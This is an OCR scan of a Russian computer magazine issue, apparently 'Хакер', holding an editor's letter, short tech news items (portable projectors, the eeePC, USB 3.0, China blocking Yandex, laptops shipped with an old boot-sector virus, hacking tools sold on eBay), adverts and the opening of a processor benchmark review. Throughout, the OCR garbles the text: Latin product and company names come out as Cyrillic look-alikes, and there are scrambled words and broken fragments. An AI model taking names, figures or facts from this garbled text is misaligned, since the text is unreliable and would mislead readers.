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СКОЛЬКО СУЩЕСТВУЕТ ЖУРНАЛ, СТОЛЬКО РЕДАКЦИЯ ПОЛУЧАЕТ РАЗЛИЧНЫЕ СООБ- 
ЩЕНИЯ, В КОТОРЫХ НАШИ СТАТЬИ НАЗЫВАЮТ ПРОВОКАЦИОННЫМИ, НЕЭТИЧНЫМИ. 
ИНОГДА ДАЖЕ ГОВОРЯТ, ЧТО МЫ НАРУШАЕМ ЗАКОНОДАТЕЛЬСТВО. В ПОСЛЕДНЕЕ ВРЕМЯ 
ТАКИЕ СООБЩЕНИЯ СТАЛИ ПРИХОДИТЬ ЧАЩЕ, И ВОТ ЧТО Я ХОЧУ СКАЗАТЬ ПО ЭТОМУ 
ПОВОДУ. 



«Хакер» 



| — единственный честный компьютерный журнал в России. Каким был, таким и останется. В России 

только «Хакер» пишетотом, каким конкретно образом спамеры организуютсвой бизнес. Только «Хакер» 
рассказывает о проблемах платежных систем и кражах из электронных банковских систем. Только мы 
проводим развернутые исследования и подробно сообщаем об ошибках в самом популярном софте. Только 
мы говорим о нелегальном цифровом бизнесе. Только мы честно пишем, какбесплатнозвонитьпо всему 
свету, чем конкретно опасен Бкуре, как можно сделать из БѴБ-привода мощный лазер и как лучше всего 
организовать автоматический мониторингзагрузки сети из сотни компьютеров. 



Д потому что это актуально и интересно, и нам, и тебе. Это отражение того, что прямо сейчас происхо' 
дит. Благодаря этому подходу, свежести и нестандартности за время своего существования журнал воспи- 
тал многотысячную армиюталантливых и умных людей, склонных к незаурядности и ярко раскрывшихся в 
самых разных ІТ-областях. Я знаю это точно — я каждый день общаюсь с такими людьми. Это и есть миссия 
нашего журнала, самое ценное в нем. 
пікііогг, главный редактор X 
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ДМИТРИЙ ТРАВИЙ 

/ ОМІТВѴ.ТВАѴШ@СМАІІ..СОМ / 



Обо всем за последний месяі_ 



Чудо-ящик с глазом 

Компания Ерзоп представила довольно интересную новинку, которая назы- 
вается «Ультрамобильный домашний видеоцентр Ерзоп ЕМР-ЭМ1». На самом 
деле это портативный проектор, в котором имеется ЭѴЕ)-привод и акустика. 
Устройство позволяет подключать внешние носители через ИЗВ-порт и не- 
посредственно с них воспроизводить ЭіѵХ, МРЗ, 1РС. Но и это еще не все — к 
ящику можно подрубить комп или игровую приставку и почувствовать, что 
такое компьютерные игры на большом экране в разрешении 480р. Устройс- 
тво очень компактное и оборудовано специальной ручкой для переноски, 
что позволит тебе брать его с собой на отдых. Весит коробка тоже не очень 
много — всего 3,8 кг. Все это и возможность формировать изображение на 
небольшом расстоянии от глаза до экрана делают такой проектор удобным 
для применения в небольших помещениях. И самое сладкое — цена. За чудо- 
ящик просят всего 19 500 рублей. Это и просто для ЗЬСО-проектора недорого, 
а тут еще и куча фич в довесок. Только помни об особенности проекторов 
— они любят темные помещения. 




Компания ВіТМІСКО начала выпуск 
самого большего 330-диска для 



ноутбуков объемом 41 Ѳ Гб. 

Это рекорд объема для накопителей на 
базе флеш-памяти. 






Отечественные 

андроиды 

Не только японцы разрабатывают человекоподобных роботов 
— российские компании тоже не отстают. Компания «Андроид- 
ные роботы» уже сейчас производит некоторые модели новых 
друзей человека. Например, андроид АК- 100 «Добрыня», кото- 
рый используется на уроках в школах и в качестве развлечения 
на различных выставках и шоу. Рост робота составляет 35 см, вес 
— 1,5 кг. Андроид может имитировать все основные движения 
человека и превосходит свои зарубежные аналоги по времени 
работы от аккумуляторов. Стоит такой друг 28 700 рублей. Но 
более интересной является новая серия роботов І-ѵап, выпуск 
которой намечен на конец 2008 года. Эти андроиды смогут при- 
меняться в качестве шахтеров, охранников, железнодорожни- 
ков, танцоров. Но такие модели существенно дороже, их можно 
будет даже брать в аренду. Авот более простой вариант довольно 
интересен для обучения — для него можно писать программы и 
вживую видеть результат своего труда. Возможно, при большом 
старании удастся заставить робота искать носки по квартире или 
варить кофе. И если эта индустрия будет также весело развивать- 
ся, то не за горами тот счастливый момент, когда огромные чело- 
векоподобные боевые роботы начнут охранять наши границы. 



Компания Арріе продала 1 ІѴІЛ Н коммуникаторов 
іРЬопе. На это им понадобилось всего 74 дня 
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Оборудование сертифицировано. Услуги лицензированы. На правах рекламы. Список устройств, поддерживающих услугу, перечень городов, информация о которых доступна при пользовании услугой, а также возможности услуги при нахождении в вашем регионе 
уточняйте по номеру Об 500. 6РК$-трафик платный. «Карты Соодіе» являются товарным знаком корпорации Соодіе. Любые другие названия компаний и продуктов могут быть товарными знаками соответствующих владельцев. ® Ыаѵіед 2007. АН КідМз Кезегѵесі. 



Заблудился? 




Скачай карты боодіе 




Карты Ооодіе - удобный навигатор 
в твоем мобильном телефоне! 

Найти нужный адрес, подобрать оптимальный маршрут 
проезда можно нажатием всего нескольких клавиш. 

Карты можно приближать, удалять, перемещать в любом 
направлении - и при этом не перезагружать страницу. 
Загрузи карты Ооодіе в свой телефон по номеру в Об 84 300 

Узнай больше в 06 500 

Соодіе 

Карты 




Билайн" 

живи на яркой стороне 






Заблокированный 

поиск 



м» ш** <ѵ«- н і іі^ 

(■м ■! I пішв вЫ вв В ягіЪі ьі ■ ■ ш шшгпі ш &ша 



ТтЛ-ц . МУр .-■ і' у іпісі г л 

^яшір^ін ііч іамг^ дм 




Китайцы особенно не церемонятся с теми ресурсами, которые их по 
каким-либо причинам не устраивают, — они просто блокируют на фиг 
доступ к ним на территории всей страны. В последнее время подобные 
случаи участились, поскольку стали очень популярны вопросы цензуры. 
Многие известные ресурсы уже были заблокированы. Самыми известны- 
ми из них являются ѴѴікіребіа, РИскг и Ьіѵеіоигпаі. И вот недавно к этому 
списку присоединился и наш Яндекс. Уж чем так китайцам не угодил 
русский поиск, точно сказать сложно, но, согласно предположениям, ки- 
тайцы усмотрели в нем возможность нахождения через него информации, 
которую не одобряет китайское правительство. Есть специальный сайт 
— угеаШгеѵ/аІІоІсЫпа.огу. на котором можно протестировать доступность 
любого адреса на территории Китая. Стоит отметить, что появилась спе- 
циальная фраза, которая в переводе с китайского на английский означает: 
«Іуѵаз СгеаН-Ріге-ѴѴаІІеб». Эту фразу владельцы заблокированных сайтов 
размещают у себя на страницах. Такими темпами китайцы скоро будут 
читать только местные новости... 




эль Ѵоуа§ег 1 — самый далекий от Земли компьютер. На данный момент 



расстояние от него до Солнца составляет 1 5,44 тераметров и с каждым 
годов увеличивается на 1,6 МЛН км. 



Долгожданный 

малыш 

Компания А51І5 наконец объявила о начале продаж портативного еееРС. 
Этот малыш работает на базе процессора Іпіеі РеШзшп М 900МІ12, имеет 
ѴѴі-Рі, ЬАРІ, 256 или 512 Мб оперативы, веб-камеру и 7-дюймовый экран 
800x480. Пока не очень интересно, но идем дальше: вместо жесткого 
диска у ноутбука две карты памяти. Одна — объемом 2 Гб — для опера- 
ционной системы, а вторая — объемом от 4 до 16 Гб — для нужд поль- 
зователя. Устройство весит всего 890 г и стоит всего 200 (!) долларов за 
начальную модель. Из операционных систем можно выбрать как ѴѴіпХР, 
так и Ьіпих, который предлагается в двух вариантах: упрощенном и пол- 
ноценном. Также можно выбрать цвет модели: черный или белый. По 
сообщениям первых покупателей, работа с текстом, почтой, браузером и 
прочим не вызывает никаких проблем. ѴСА-выход позволяет подклю- 
чить внешний дисплей, а ІІЗВ-разъем — внешний жесткий диск или 
модуль ВІиеНооЙі, который изначально не встроен. Такой субноут может 
составить очень серьезную конкуренцию дорогим моделям сравнимых 
габаритов — его цена в 10 или больше раз ниже . . . 
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нтября компании Соо§1е исполнилось 



10 



ЛѲТ. Поисковик ежедневно 



обрабатывает около 511 МЛН поисковых запросов и индексирует более 
8 МЛРД веб-страниц. 



Захавали Наѵок 

Если ты играешь в компьютерные игры, то 
наверняка слышал о физическом движке Наѵок. 

Он позволял красиво разлетаться в стороны врагам 
из На11-Ше 2 и практически всех хитовых игр последних лет. И вот 
недавно этот движок был куплен компанией ІпНеІ, причем вместе с 
компанией-разработчиком. Что это может дать простым игрокам? 
Если Іпіеі сделает-таки аппаратную поддержку этого двигла в своих 
процессорах, то общая производительность при обсчете сложных 
физических процессов будет заметно выше. Это даст ощутимое 
преимущество геймерам, использующим камни Іпіеі, и не только им, 




поскольку помимо игр движок 
использовался при созда- 
нии таких фильмов, как «Посейдон», «Матрица», «Троя», «Царство 
Небесное» и многих других. Серьезную конкуренцию в этой области 
могли бы составить карты физических ускорителей А^еіа, но и они 
тихо мрут, так не сумев как следует закрепиться на рынке. Так что в 
скором времени ІпГеІ станет единственно возможным решением для 
любителей красивой физики. 




И вирус в придачу 

Когда ты покупаешь себе новый компьютер или ноутбук с предустанов- 
ленной на нем осью, ты полагаешь, что операционка чиста и нетронута 
и что уж никаких вирусов на ней быть точно не должно. Но, пред- 
ставь, производители компьютеров могут подкинуть тебе подобный 
сюрприз. Неожиданно выяснилось, что немецкая компания Мебіоп РС 
поставляла ноутбуки, зараженные вирусом 13-летней давности под 
названием Зіопесі Ап^еііпа. Вирус находился в загрузочном секторе 
жесткого диска и в загрузочном секторе флоппи-диска, который шел в 
комплекте. Производитель предлагает покупателям форматнуть хард и 
восстановить систему с прилагаемого компакт-диска. Лично я вирусов 
в придачу к компу не получал, но на моем десктопе кем-то из сотруд- 
ников магазина любезно была установлена пиратская версия Иеесі Рог 
Зреесі СагЬоп. Ну нечем было продавцу заняться в ожидании покупате- 
лей. Таким же образом и установщики ОС на немецкие ноутбуки могли 
в перерыве полазить по непонятным интернет-сайтам... 




Игротариф 

Если ты являешься фанатом компьютерных игр, то тебе будет интере- 
сен новый тариф МТС под названием САМЕК. Его основой являются 
тарифы КЕЮ и КЕЭ_іехі, которые дают существенные скидки при 
общении внутри тарифа. Но сам пакет САМЕК включает в себя более 
интересные вещи: возможность получать различные игровые новости, 
даты выхода нового гамеса, рецензии на уже вышедшие продукты. Кро- 
ме этого, ты сможешь получить доступ к рингтонам на основе мелодий 
из игр, возможность установить эти мелодии вместо гудка при звонке 
на твою трубу, доступ к ѵѵар-порталу и специальному голосовому сер- 
вису. Но и это еще не все — появляется доступ к темам для телефона на 
основе популярных игрух, к самим играм для твоей мобилы и к базе чи- 
тов. Теперь можно будет неплохо скоротать время в ожидании новинок 
или вдали от любимой игровой станции (в простонародье — компа :)). 
Если ты являешься абонентом тарифа КЕЭ или ЯЕВ_1ехі, то подключить 
пакет САМЕК можешь хоть сейчас — по номеру 0022254. 
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Используйте 
компьютеры ОШі 

и забудьте о проблемах ! 
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ІВ Сооеіе Марз добавлены карты ешё 



54 страні 



Лед тронулся 

Ь« Л I 1 -» 

• Юридический центр программной свободы (ЗоіТѵѵаге 

Ргеебот Ьаѵѵ Сепіег) недавно подал первый в истории иск 
по поводу нарушения лицензии СРЬ. Инициаторами иска 
стали разработчики набора юниксовых утилит ВизуВох, 
которые обычно используют во встроенных системах. По лицензии, 
каждый девелопер, использовавший этот набор утилит, обязан 
предоставлять исходный код своей программы. Компания Мопзооп 
Микітесііа же открыто заявляет об использовании ВизуВох и при 
этом никаких исходников никому не показывает. Разработчикам это, 
естественно, не понравилось, и они решили требовать выполнения 
условий лицензии через суд. Также они настаивают на возмещении 
компанией всех судебных издержек. Как уже было упомянуто, это 
первый в истории подобный судебный процесс — раньше либо на 
такие вещи просто закрывали глаза, либо пытались урегулировать 
ситуацию мирно, не доводя ее до суда. Эрик Андерсен (Егік Апбегзеп), 
один из разработчиков ВизуВох, так прокомментировал свой иск: 

«Мы лицензируем ВизуВох под СРЬ, чтобы дать пользователю свободу 
изменения кода. Если компании исполняют условия лицензии, то нам 
ничего не остается, кроме как просить наших адвокатов добиться 
этого через суд». 





17 сентября Ілпих исполнилось 



Іблетъ 




Мобильник плюс 
проектор 

Очень интересный рабочий прототип гибрида мобильного телефона и проектора про- 
демонстрировала компания Техаз Іпзігитепііз на мероприятии под названием Рерсот. 
Первыми познакомиться с новинкой смогли представили популярного блога Еп§ас1§еі. 
Устройство называется Рісо РгсдесЮг и с виду ничем не отличается от обычной мобилы 
— выдает новинку разве что глаз проектора. С помощью него можно смотреть фильмы 
где угодно — от туалета до вагона метро. Размер проецируемого изображения — до 37 
см. Это первый образец, который производитель решился продемонстрировать общест- 
венности, но и он не лишен недостатков — изображение очень бледное и вообще весьма 
посредственное. Но в Техаз Іпзігитепіз заверяют, что это связано с тем, что на опытном 
образце в качестве источника света применен лазер, и обещают, что на серийном 
варианте будет уже ІЛЮ, с которым все будет намного лучше. Подробностей о продолжи- 
тельности работы в режиме воспроизведения не сообщается, но, наверняка, батарейку 
проектор ест не запивая. Устройство должно появиться в продаже в 2008 году. 




Токийская компания Сепес создала материал ВСе 






елым при падении с высоты 



22 метровя 
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•ІІІі 

Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 



Добавьте цвета вашему офису 

Встречайте многофункциональное устройство СІ_Х-2160 - цветное, 
лазерное, компактное. Его появление полностью преобразит ваш офис. 
СЕХ-2160. Больше цвета, больше возможностей. 

СІ-Х-2160 = принтер + сканер + копир 






Галерея Затзипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. ѵѵш/.затзипд.ги. Товар сертифицирован. Реклама. 








ародная медиакомпания, название которой не разглашается, выплатила 



іЛЫМ пііі' 

$3,46 млн 

ІПЯІ8ПБ1ВГ 



в качестве штра 


За 


а за использование пиратского со 


г.г 


та. Это рекордная 



я подобных исков. 



Дни студента 
уСоодІе 

Соо§1е по всей России проводит компанию под названием Соо§1е ТесЬ 
Та1к§, цель которой познакомить более 7 миллионов студентов с последни- 
ми разработками Соо§1е. Встречи проводят 50 сотрудников российского 
офиса Гугла — программисты, маркетологи, руководители... Они расска- 
жут об удобстве и преимуществах работы с их продуктами. Например, 
очень активно продвигаются службы Соо§1е для образования (Соо§1е Аррз 
Іог Ебисагіоп), которые включают почту, календарь и средство обмена 
мгновенными сообщениями. Ну с почтой все понятно. Мгновенными сооб- 
щениями у нас традиционно обмениваются через не очень мною любимую 
ІС(^. А вот календарь — реально полезная штука. На собственном опыте 
могу сказать, что вывешивать расписание и даты каких-либо значимых со- 
бытий, связанных с обучением, очень удобно на публичном онлайн-кален- 
даре. Главное, чтобы этим кто-то занимался, так что дави на старосту :). Но 
самые вкусные сервисы работают только на английском и из-за этого у нас 
не востребованы — это поиск по книгам и поиск по научной литературе. 




Новый порт 

На форуме ГОР (ІШеШеѵеІорег Рогшп) вице-президентом ІШеІ Пэтом 
Гел сингером была представлена новая технология ИЗБ 3.0. Разработка 
находится в начальной стадии, но уже сейчас ожидается десятикратный 
прирост скорости обмена данными по сравнению с ИЗБ 2.0. Пиковая 
пропускная способность достигнет 4,8 Гбит/с. Это стало возможным благо- 
даря применению оптических и медных соединительных кабелей. Помимо 
увеличения скорости ГГЗВЗ.О будет поддерживать более длинные соедини- 
тельные кабели и будет обратно совместим с предыдущими версиями ІІЗВ. 
Единственная проблема, которая сохранится в этой версии, — высокий 
уровень загрузки ЦП. Технология разрабатывается совместно с компания- 
ми Місгозой, Неѵѵіеп-Раскагсі, Техаз ІпзйгитеШз, ИЕС и ИХР ЗетісопбисШгз. 
Первый вариант спецификации будет представлен в начале следующего 
года, а устройства появятся в 2009-2010 годах. 




• • • 




Нщщшй^щ^сионе2 ^ ^ыт^авIIIИй^лоте2еIшючт^^^^^^^^ев20 ^1 отказалсяот^ыи^^ыIIIа. 
Свой отказ он мотивировал тем, что ему просто нек^ігшотратитГтакие большие деньги"ИИИ 



Отобранная прелесть 




Если ты хоть раз играл в ММО-игры, то знаешь, что продажа игровых персонажей и предме- 
тов является довольно распространенным средством заработка. Естественно, производи- 
тели игр запрещают проводить подобного рода сделки и всячески стараются их пресекать. 
Так, в досадном положении оказался игрок под ником Зйакз, который приобрел ночного 
эльфа у игрока 2еиго. Эльф был прокачан знатно: 70-й уровень с крутым оружием и броней 
(например, меч Тѵѵіп Віабез оі АггтонЬ, который есть только у двух персонажей во всей 
игре) . За персонажа пришлось выложить кругленькую сумму — 10 тысяч баксов. Но радость 
обладания новым чаром длилась недолго — через некоторое время доступ к нему был закрыт. 
Компании Вііггагсі ЕшеіТаіптепИ не понравилось такое развитие событий, и она признала 
сделку нарушающей установленные правила. В результате ЗЬакз остался с носом — персонаж 
заблокирован, а деньги ему, естественно, возвращать никто не собирается. Не желающий 
мириться с подобным исходом игрок планирует подать в суд как на саму Вііггагсі, так и на 
продавца. Но вряд ли из этого что-то выйдет. . . 




Будульник-тяжеловес 



Всегда ли ты просыпаешься под звонящий будильник? 
Многие люди умудряются либо просто продолжать спать, 
либо в полудреме зашвырнуть будильник куда подальше 
и тогда уже продолжать спокойно спать. Специально для 
таких сонь был создан уникальный будильник ІитЬо 
Тѵѵіп Веіі Аіагт Сіоск. Уникальность в нем всего одна, но 
какая! Высота часиков составляет 47 см. Звонит такая 



штука знатно, а выкинуть ее банально не хватит сил 
— весит будильник целых 2,6 кило. Но все указанные дос- 
тоинства девайса легко оборачиваются недостатками. 
Во-первых, куда такую махину ставить? А во-вторых, есть 
вероятность начать день с головной боли или с неприят- 
ного общения с соседями, которые устали просыпаться 
вместе с тобой. 
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Баннерные республики 



Интересный способ получения прибыли государственного масшта- 
ба используют жители небольшого атолла Токелау в Тихом океане. 
Несмотря на то что число жителей едва ли достигает 1500 человек, 
количество доменов в местной зоне Дк переваливает за 1,6 миллиона. 
Для сравнения — зона .ш только недавно достигла 1 миллиона доменов. 
Изначально, получив свою собственную зону, руководство островов 
не знало, что с ней делать, и передало права на коммерческую реги- 
страцию доменов голландскому бизнесмену Джусту Зурбье, который 
организовал компанию ЭОТ ТК и стал раздавать домены на халяву, 



взамен лишь размещая на сайте рекламный блок. Прибыль от рекламы 
делится пополам между компанией и руководством атолла. В итоге 
она составляет около 10% валового национального дохода. Кроме 
получения финансовой выгоды подобный бизнес позволил развить на 
островах интернет — доступ к интернету для всех жителей абсолютно 
бесплатен, хотя большинство компьютеров находится в интернет-кафе 
и школах. Новое время — на смену банановым республикам приходят 
баннерные :). 





Консультации тренеров по 
тяжелой: и легкой отпегнке 
{Ьаггіѵѵаге и »Птаге) 

-Л 

Клмдый ЦРНІ. 

с10.0&др20.М 



Эстафета с последовательным 
подключением яомп моторной 
периферии 



МоСчлмм трнбо|м: 
подбор - тестирование - 
настройка телефона 



Метание дисков 
С последними фильмами 



Художественная сборка 
компьютеров под заказ 






САВЕЛОВСКИЙ 



торговый ноннпежс 

БЛИЖЕ К БАМ. 












КАСПЕРСКОГО 



Признанный 

антивирус 

Ведущий американский компьютерный интернет-портал СИЕТ присудил 
Антивирусу Касперского 7.0 престижную награду СИЕТ Есікогз’ Сйоісе 
(«Выбор редакции»). В прошлом году такой награды удостаивалась 
предыдущая версия Антивируса Касперского 6.0. Стоит отметить, что эта 
награда подразумевает признание продукта лучшим в своей категории 
и задающим стандарты для всей индустрии. Эксперты СИЕТ заметили: 
«Антивирус Касперского 7.0 затмевает своих конкурентов благодаря со- 
четанию совершенной антивирусной защиты и простоты использования. 
«Лаборатория Касперского» постоянно демонстрирует самое короткое 
время реакции на новые вредоносные программы. Если вы ищете качест- 
венное и быстрое антивирусное приложение, которое при этим потребля- 
ет совсем немного системных ресурсов, Антивирус Касперского 7.0 — то, 
что вам нужно». Также было отмечено высокое качество интерфейса, 
которое позволяет неопытным пользователям полноценно работать с про- 
граммой, а опытным — использовать дополнительные возможности. 



[(^іілщлсти»тздкі»іПЯ 

25 леи 






- исполнилось 



Реальный размер 



Каков размер твоего почтового ящика? На момент написания новости в моем Стаіі- 
ящике было занято 866 Мб из 2902 Мб возможных. И это больше чем за год активного 
использования. А удалял я только сообщения, самим Стаіі отфильтрованные как спам. 
Весь прорвавшийся треш и нормальные письма до сих пор хранятся на сервере. Но не- 
давно компания Яндекс — основной конкурент Соо§1е в России — объявила о расшире- 
нии базового размера почтового ящика до 10 Гб. В среднем для заполнения такого ящика 
надо отправить порядка 3 миллионов писем. В случае если ты активно пересылаешь по 
почте фильмы НЭ-качества и такой объем тебя тоже не устраивает, можно неограничен- 
ное количество раз расширить объем (на 1 Гб за раз) . Помимо общего размера был уве- 
личен и максимальный размер отдельного сообщения — теперь в нем можно отсылать 
до 20 Мб. Это, на мой взгляд, важнее, чем увеличение общего объема, поскольку в наше 
время даже несколько фотографий, сделанных не самым дорогим фотоаппаратом, уже 
могут не уместиться в одном сообщении. 



Япаех 

найдётся всё 



> 




4 из 5 



самых богатых людей Америки — 



ІТ'ШНИКИІ 



Путь к цифре 





Уже практически весь цивилизованный мир принимает телевизионный 
сигнал в цифре. Но у нас это только в планах. Производители тюнеров это 
понимают и производят так называемые «гибридные» тюнеры, в которых 
присутствует как цифровой, так и аналоговый тюнер. И вот компания 
ВеЬоЫег представляет свой новый гибридный ТѴ/РМ-тюнер — ВеЬоЫ 
ТѴ Н6, предназначенный для приема телевизионных и радиопрограмм, 
транслируемых в формате ЭѴВ-Т. Тюнер построен на элементной базе 1МХР 



и ІпНеІ. В качестве основного чипсета используется испытанный временем, 
хорошо зарекомендовавший себя декодер 5АА7135НЬ, что в сочетании 
с гибридным ВЧ-блоком 1МХР позволяет получить образцовое качество 
аналогового изображения и звука. За декодирование цифрового сигна- 
ла отвечает СОРЭМ-демодулятор ІпСеІ СЕ 6353. Также тюнер позволяет 
включать компьютер с пульта ДУ, вещать сигнал в сеть и имеет в комплекте 
удобную программу для работы с устройством. 
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тедапеѵг 



Сате оѵег 



//ѴТЕРІМЕТ 



Ты уже наверняка сталкивался с сообщениями о том, что некий геймер был 
так увлечен компьютерной игрой, что не ел, не спал и в результате скончал- 
ся прямо перед монитором. Мне никогда не была понятна столь нездоровая 
страсть к компьютерным развлечениям. И что самое удивительное, подоб- 
ные случаи по-прежнему происходят. В Китае в одном из интернет-кафе 
30-летний боец виртуальных полей просидел трое суток, не отрываясь от 
монитора. После того как он потерял сознание, его госпитализировали, но 
он скончался по дороге в больницу от общего истощения организма. Самое 
непонятное в этой истории — то, что никто из работников кафе и друзей 
игрока не оторвал его от монитора и не отправил домой спать до насту- 
пления столь трагического финала. Название игры, выжавшей все соки 
из одержимого геймера, не разглашается. Думаю, такими темпами скоро 
придется подмешивать столь увлеченным игрокам в кофе снотворное, 
чтобы они немного поспали хотя бы лицом в клавиатуру. 



Спонтанный апдейт 

Недавно было замечено очень 
странное поведение ѴѴіпсіоѵѵб: 
она самостоятельно скачивала и 
устанавливала апдейты. При этому 
пользователя ничего не спрашива- 
лось и установка происходила даже 
в том случае, если автоматическое 
обновление было вообще выклю- 
чено. Такое самоуправство вызвало 
массу недовольства, поскольку 
многие очень болезненно относятся к изменениям в своих компьютерах, 
особенно если их об этих изменениях даже не предупреждают. Так, Мелкософт 
спонтанно обновил под ХР ЗР2 следующие файлы: сбт.сШ, тіарі.сШ, тіаиск. 
ехе, тіаисрі.срі, тіаиеп^.сШ, тіскиі.сШ, тірз.сШ, тір52.сП1, тпѵеЪ.сШ. А 
под ѴізГа обновили тіарі.сШ, тіарр.ехе, тіаиск.ехе, тіаиеп^.сШ, тіских.сШ, 
тккіѵег.сШ, тірз.сШ, тір52.сШ, тіѵуеЪѵ.сШ. Проверить факт скрытого 
обновления можно через системный лог. Под ХР’юшкой его можно по- 
смотреть так: «Пуск Выполнить^ еѵепсѵтмпзс». Надеюсь, что подобная 
практика не станет постоянной, ведь были случаи, когда какое-либо 
обновление мешало нормальной работе сторонних программ и от него 
приходилось отказываться. 



МІствдН; 






ѴѴІПСІОѴѴ5 х Р 




американцев готовы променять секс на интернет. 



Хакеры наглеют 



20 % 



В принципе, купить какой-либо сложный и действенный троян или еще что-нибудь 
незаконное довольно сложно. Подобные вещи продаются либо через знакомых, либо на 
закрытых форумах и каналах в ІКС, доступ на которые тщательно фильтруется. Но недав- 
но какой-то смельчак выставил на продажу свой хак-софт прямо на еВау. Вообще говоря, 
учебные материалы и некоторое количество утилит уже выкладывались, но теперь по- 
средством еВау реализуется очень дорогой и сложный софт: скрытые загрузчики троянов 
и некоторые утилиты для взлома сайтов. В результате практически каждый, у кого есть 
аккаунт на еВау и кошелек на РауРаІ, может приобрести вполне действенное средство, ко- 
торое не поймают антивирусы. Наверняка, эти лоты будут закрыты, но за всем аукционом 
уследить тяжело, и при желании продавец все-таки найдет своего покупателя — был бы 
спрос. А спрос на подобные вещи с развитием интернета только растет. 




Серия игровых мышей и клавиатур Х7 

Бери в русифицированной упаковке! 

Только тогда гарантия на мыши и клавиатуры Х7 составит 24 месяца! 



Разрешение 



Игровые клавиши 



Можно менять 
во время игры 



Легко заменить 
на обычные 



Совершенная форма 



Работают только 
пальцы 



Функция ЗхРіге 



Один клик 
заменяет 
три нажатия 



абсолютное 

оружие 



Дополнительные 
«ножки» 
в комплекте 



4 скоростных режима 



Время отклика в режиме 
«Экстрим» - 7,92 мсек. 



Полная 

водонепроницаемость 



Большая устойчивость 



Можно чистить 
и погружать в воду 



\л/\лдл/.а4іесІі.ги 









т'еггигп 






ЕВГЕНИИ ПОПОВ 



ЯДРА- 

ИЗУМРУДЫ 



ТЕСТИРОВАНИЕ ПРОЦЕССОРОВ 





Больше ядер — больше экстаза и высокотехногенного наслаждения. 

Производители, с позволения сказать, ядреных процессоров уже не могут довольство- 
ваться Соге 2 и Х2. Двойки уходят в небытие, и вакантное место в скором времени будет 
занято четырехъядерными процессорами. Пока что новый век только начинается, 
и ждать рабочие новинки на прилавках стоит только к весне. В сегодняшнем обзоре мы 
подведем черту, рассмотрим последние наиболее интересные решения в сфере процессо- 
ров и проведем соответствующее тестирование. 



Н МЕТОДИКАТЕСТИРОВАНИЯ 

Что требуется от процессора? Естественно, производительность. Мы ис- 
пользовали стандартный набор приложений для оценки рабочих нюансов 
тестируемых моделей. Общая схема испытаний выглядела следующим 
образом: 

1. Синтетическоетестирование с помощью программного пакета ЗйМагк 
2006. Мы указали в результатах толь ко Оѵегаіі-параметр — общую оценку 
всей системы. 

2 . Обработка изображений. Любимая фотохудожниками программа АбоЬе 
РбоІозЬор версии 9.0 (052) пригодилась нам и в этом нелегком деле. 
Картинка в высоком разрешении преобразовывалась с помощью блоков 
обработки, а результатом являлось время, затраченное на выполнение 
всего цикла операций. 

3. Скорость математических подсчетов. Крохотная по размерам програм- 
мка БирегРІ, плод работы нескольких энтузиастов, стала своеобразным 
мерилом производительности современных процессоров. Фактически 
считалось число «пи» сточностью до одного миллиона знаков после 
запятой. Результатом было опять же время, затраченное на вычисление. 

4 . Не забыли, конечно, и об игровом тестировании. На разрешении 
800x600, чтобы уменьшить влияние видеокарты на результат, было запу- 
щено заранее записанное демо на популярной платформе Р.Е.А.Р. 



Зоске* І.СА775: 

Материнская плата: М 5 І 975Х Ріаііпит 

Память: 2 x 1024 Мб, Кіпдзіоп НурегХ 0РР2 КНХ720002К2/16 

Кулер: Ѳіасіаііесіі Ідіоо 7200 І_ідМ: 

Видеоплата: А 51 І 5 Кабеоп ЕАХ1900ХТХ, 512 Мб 
Винчестер: 80 Гб, Беадаіе Ваггасисіа 7200 грт, ШЕ 
Блок питания: 450 Вт, Ріозіоп 

Тестовый стена: 

Зоскеі АПЛ2: 

Материнская плата: АБЫЗ М2М32-5Ы Реіихе 

Память: 2x1024 Мб, Кіпдзіоп НурегХ 00 К 2 КНХ7200Р2К2/16 

Кулер: ЭІасіаІІесН Ідіоо 7200 І_ідЫ 

Видеоплата: А 51 І 5 Касіеоп ЕАХ1900ХТХ, 512 Мб 

Винчестер: 80 Гб, Беадаіе Ваггасисіа 7200 грт, ЮЕ 

Блок питания: 450 Вт, Ріозіоп 

Тестируемое оборудование: 

АМБ АіЫоп 64Х2 5200+: АМ Б АіЫоп 64X2 5000+: АМБ АіЫоп 64X2 5000+ 
ВгізЬапе: АМй АіЫоп 64X2 6000+: ІпІеІСоге 2 Рио Е6300: ІпІеІСоге 2 Био 
Е4300: Іпіеі Соге 2 йио Е6320: Іпіеі Соге 2 0X6700 
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АМО АТЫоп 64 Х2 5000+ ВгізЬапе 

Ядро: ВгІ5Ьапе 

Технология производства, нм: 65 
Частота ядра, ГГц: 2,6 
Количество ядер: 2 
Кэш второго уровня І_2, Кб: 2х 512 
Коэффициентумножения: 13 
Частота шины, МГц: 400 
Сокет: Зоскеі АМ2 




А вот и свидетельство компании АМО о том, что 65 нм подвластны инжене- 
рам. Интересно, что производитель не стал повышать цену на эту модель 
и оставил ее равной стоимости процессора на базе ядра ѴѴіпсІзог. Все пре- 
лести этого камешка вытекают из более совершенной технологии произ- 
водства. Заметим, что для установки 65-нм процессора придется обновить 
ВІ05 до версии, поддерживающей ВгізЬапе. В противном случае могут 
возникнуть проблемы со стабильностью. Предыдущая версия мало чем от- 
личается от нового решения, если говорить обуровне производительности. 
Однако новыйтехпроцесс позволяет потреблять меньше энергии — около 
11% разницы ТОР получено при 100% нагрузке. Следовательно, любители 
разгона оценят ВгізЬапе по достоинству. 

0 

Придраться кАМй АТЫоп 64X2 5000+ ВгізЬапе сложно. Однако выбор 
каждый должен сделать самостоятельно. Вполне вероятно, что ядра отІпТеІ 
окажутся сердцу милее. 



ІпіеІ Соге 2 Рио Е6300 

Ядро: Сопгое 

Технология производства, нм: 65 
Частота ядра, ГГЦ: 1,86 
Количество ядер: 2 
Кэш второго уровня І_2, Кб: 2048 
Коэффициентумножения: 7 
Частота шины, МГц: 1066 
Разъем: 1.6А775 




По сравнению с основной действующей силой линейки ІпТеІСоге 2 0ио, 
рассматриваемый процессор изготовляется с урезанным до 2 Мб объемом 
памяти второго уровня. Напомним, чтоутоповых моделей размер кэша І_2 
составляет 4 Мб. По производительности этот камень можно соотнести, 
пожалуй, с АМР АТЫоп 64X2 5000+. Он до сих пор является неплохим пред- 
ложением для энтузиастов и любителей разгона. 

0 

А когда-то мы гоняли этот камешек и в хвост и в гриву, приятно удивляясь 
разгонному потенциалу самой младшей модели в линейке процессоров на 
базе ядра Сопгое. Сегодня есть более интересные предложения на рынке, 
